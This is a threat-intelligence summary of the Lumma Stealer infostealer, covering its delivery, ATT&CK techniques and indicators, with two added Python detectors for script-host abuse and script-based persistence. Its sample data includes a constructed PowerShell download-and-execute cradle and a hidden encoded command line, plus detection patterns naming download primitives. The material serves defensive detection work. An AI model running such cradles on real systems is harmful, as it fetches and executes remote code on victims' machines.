Lumma Stealer is an evolving infostealer sold as malware-as-a-service and distributed through trusted platforms such as GitHub to harvest credentials, cryptocurrency wallets, and personal data, using evasion, scripting, and living-off-the-land techniques. (Affected: end users, software developers)
Key points:
- Lumma Stealer is a malware-as-a-service (MaaS) infostealer first seen in 2022; the source reports a 369% rise in infections in 2024.
- Distributed via GitHub abuse, fake notifications and comments, malvertising, and social engineering.
- Defense evasion includes sandbox detection, payload encryption, polyglot files, and obfuscation.
- Employs living-off-the-land binaries (mshta.exe, PowerShell, wscript.exe) and process hollowing.
- Initial access through spearphishing and social engineering targeting developers and users.
- Steals web browser credentials, session cookies, cryptocurrency wallets, and 2FA secrets.
- Persistence via Startup folder shortcuts and scheduled tasks that launch malicious scripts.
- Anti-analysis includes artifact cleanup and sandbox/virtual environment detection.
- Command and control and exfiltration of stolen data over HTTP/HTTPS.
- Security controls should be tested continuously with breach and attack simulation platforms to confirm they detect Lumma's TTPs.
MITRE ATT&CK techniques:
- Spearphishing Link (T1566.002) and Spearphishing via Service (T1566.003) – Fake GitHub notifications and comments trick victims into downloading malware.
- Drive-by Compromise (T1189) – Malvertising and web redirects funnel users to fake CAPTCHA pages that trick them into running a malicious command themselves.
- User Execution: Malicious File (T1204.002) – Victims manually run trojanized executables disguised as legitimate tools.
- Command and Scripting Interpreter (T1059) – PowerShell and mshta run obfuscated scripts and remotely hosted payloads.
- System Binary Proxy Execution: Mshta (T1218.005) – A trusted, signed Windows binary is abused to fetch and run the payload without a separate file being dropped on disk.
- Process Injection: Process Hollowing (T1055.012) – Malicious code is injected into a legitimate process to hide execution.
- Indicator Removal: File Deletion (T1070.004) – Malware artifacts and temporary files are deleted after execution.
- Virtualization/Sandbox Evasion: System Checks (T1497.001) – Checks for security tools and sandbox environments alter the malware's behavior.
- Credentials from Password Stores: Credentials from Web Browsers (T1555.003) – Stored passwords and cookies are harvested from browser databases.
- Steal Web Session Cookie (T1539) – Session cookies are captured for account hijacking, bypassing MFA on sessions that are already authenticated.
- Browser Extensions (T1176) – Crypto wallet and 2FA browser extensions are targeted to steal keys and authenticator seeds.
- Input Capture: Keylogging (T1056.001) and Clipboard Data (T1115) – Keystrokes and clipboard content are captured to steal sensitive information.
- Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) and Scheduled Task (T1053.005) – .url shortcuts in the Startup folder and scheduled tasks run malicious scripts.
- Masquerading (T1036) – Legitimate-looking file names and stolen code-signing certificates make the payload appear trustworthy.
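As an added example (not code from the article, and not derived from any Lumma sample), the following Python flags process-creation events that match the execution patterns listed above: mshta.exe given a remote URL, PowerShell with an encoded command (decoded from base64 UTF-16LE and checked for a download cradle), and wscript.exe/cscript.exe launching a script file. The sample events, the domain example.invalid and the user name "dev" are constructed placeholders, not indicators from the article.

```python
import base64
import re
import shlex

# Interpreters whose process-creation events are worth inspecting.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# PowerShell download-and-run primitives commonly seen inside stager one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|DownloadString|"
    r"Net\.WebClient|Start-BitsTransfer|FromBase64String",
    re.IGNORECASE,
)


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def decode_encoded_command(args):
    """Return the script behind -EncodedCommand (or any abbreviation such as
    -enc or -e), decoded from base64 UTF-16LE; None if absent or undecodable."""
    for i, arg in enumerate(args[:-1]):
        flag = arg.lower().lstrip("-/")
        if flag and "encodedcommand".startswith(flag):
            blob = args[i + 1]
            try:
                return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le")
            except ValueError:  # covers binascii.Error and UnicodeDecodeError
                return None
    return None


def analyze(event):
    """Return [(technique_id, reason), ...] for one Sysmon-style event dict."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if image not in SCRIPT_HOSTS:
        return []
    args = split_cmdline(event["CommandLine"])[1:]
    findings = []
    if image == "mshta.exe":
        # mshta given a URL fetches and runs the HTA itself; no payload file is dropped.
        for a in args:
            if REMOTE_URL.search(a):
                findings.append(("T1218.005", f"mshta.exe loading remote content: {a}"))
                break
    elif image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(args)
        if decoded is not None:
            findings.append(("T1059.001", "encoded command decodes to: " + decoded.strip()))
        script = decoded if decoded is not None else " ".join(args)
        if DOWNLOAD_CRADLE.search(script):
            findings.append(("T1059.001", "download-and-execute cradle: " + script.strip()))
    else:  # wscript.exe / cscript.exe
        for a in args:
            low = a.lower()
            if low.endswith((".js", ".jse")):
                findings.append(("T1059.007", f"script host running {a}"))
                break
            if low.endswith((".vbs", ".vbe")):
                findings.append(("T1059.005", f"script host running {a}"))
                break
    return findings


# Constructed sample events in Sysmon Event ID 1 shape (placeholders, not article IOCs).
ENCODED = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/p.txt')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/fix.hta'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -enc {ENCODED}"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe //B "C:\Users\dev\AppData\Roaming\update.js"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\dev\notes.txt"},
]


def scan(events):
    """Return [(command_line, findings)] for every event that produced a finding."""
    results = []
    for event in events:
        findings = analyze(event)
        if findings:
            results.append((event["CommandLine"], findings))
    return results


if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_EVENTS):
        print(cmdline)
        for tid, reason in findings:
            print("   ", tid, reason)
```

Decoding the encoded command before pattern matching matters: a string match on the raw command line sees only base64, and the `-e`/`-enc` abbreviations are accepted by PowerShell, so matching on the literal `-EncodedCommand` alone misses most real stagers.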
Indicators of Compromise:
- The article lists delivery URLs for Lumma, such as GitHub release asset links and MediaFire download links disguised as fixes.
- SHA256 hashes of malicious Lumma payloads are provided, for example B127DE888F09CE23937C12B7FCCFA47A8F48312B0E43EB59B6243F665C6D366A.
- Command lines abusing mshta.exe and PowerShell with encoded commands to run remotely hosted scripts.
- Scheduled task and Startup folder entries, such as a 'Lodging' task running a JavaScript payload, indicate the persistence mechanisms.
- Domain names used during infection (e.g., lumdukekiy[.]shop, kiddoloom[.]shop) associated with command and control servers.
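As an added example (not code from the article), the following Python triages the two persistence artefacts above from their on-disk text: a `.url` Internet Shortcut in the Startup folder whose target is a local script file rather than a web address, and a scheduled task (in the XML form produced by `schtasks /Query /XML`) whose action runs a script host or a script file. The shortcut and task contents are constructed for the example; only the task name "Lodging" comes from the article, and the user name "dev" is a placeholder.

```python
import configparser
import re
import xml.etree.ElementTree as ET

# File types and interpreters that, behind a Startup shortcut or a scheduled task,
# indicate script-based persistence rather than a normal application launch.
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".bat", ".cmd")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def check_url_shortcut(text):
    """Return the URL= target of an Internet Shortcut if it launches a local
    script file, else None. A .url in the Startup folder is normally a web
    bookmark; one pointing at a .js/.vbs on disk is a script launcher."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    target = cp.get("InternetShortcut", "URL", fallback="").strip()
    t = target.lower()
    is_local = t.startswith("file:") or re.match(r"^[a-z]:[\\/]", t) is not None
    return target if is_local and t.endswith(SCRIPT_EXTS) else None


def check_task_xml(text):
    """Return one record per <Exec> action whose command is a script host or
    whose arguments name a script file (schtasks /Query /XML format)."""
    root = ET.fromstring(text)
    name = (root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=TASK_NS) or "").strip()
    hits = []
    for ex in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        exe = cmd.strip('"').lower().rsplit("\\", 1)[-1]
        script_arg = args.lower().rstrip('"').endswith(SCRIPT_EXTS)
        if exe in SCRIPT_HOSTS or script_arg:
            hits.append({"name": name, "command": cmd, "arguments": args})
    return hits


# Constructed samples (not artefacts from the article); the XML declaration that a
# real UTF-16 export carries is omitted because the text is already decoded here.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file:///C:/Users/dev/AppData/Local/Temp/Lodging.js
IconIndex=0
"""

BENIGN_URL_FILE = """[InternetShortcut]
URL=https://github.com/
"""

SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Lodging</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\wscript.exe</Command>
      <Arguments>//B "C:\Users\dev\AppData\Local\Temp\Lodging.js"</Arguments>
    </Exec>
  </Actions>
</Task>"""


def triage(url_files, task_xmls):
    """Return (technique_id, detail) findings over raw artefact contents."""
    findings = []
    for text in url_files:
        target = check_url_shortcut(text)
        if target:
            findings.append(("T1547.001", f"Startup .url launches script: {target}"))
    for text in task_xmls:
        for hit in check_task_xml(text):
            findings.append(("T1053.005", f"task {hit['name']} runs {hit['command']} {hit['arguments']}"))
    return findings


if __name__ == "__main__":
    for tid, detail in triage([SAMPLE_URL_FILE, BENIGN_URL_FILE], [SAMPLE_TASK_XML]):
        print(tid, detail)
```

On a live host the inputs come from `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.url` and from `schtasks /Query /TN <name> /XML`; exported task XML is UTF-16 with a BOM, so decode it (or pass the raw bytes to `ET.fromstring`, which honours the BOM) before calling `check_task_xml`.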